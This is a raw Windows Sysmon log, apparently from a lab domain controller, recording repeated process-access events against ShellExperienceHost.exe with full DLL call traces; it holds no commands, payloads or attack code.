13:58:35.367{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.258{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.258{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.242{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.242{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405756C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405748C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405736C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405728C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000012061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000012060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.226{59A5CD1D-93F9-6005-F104-00000000A301}45404512C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|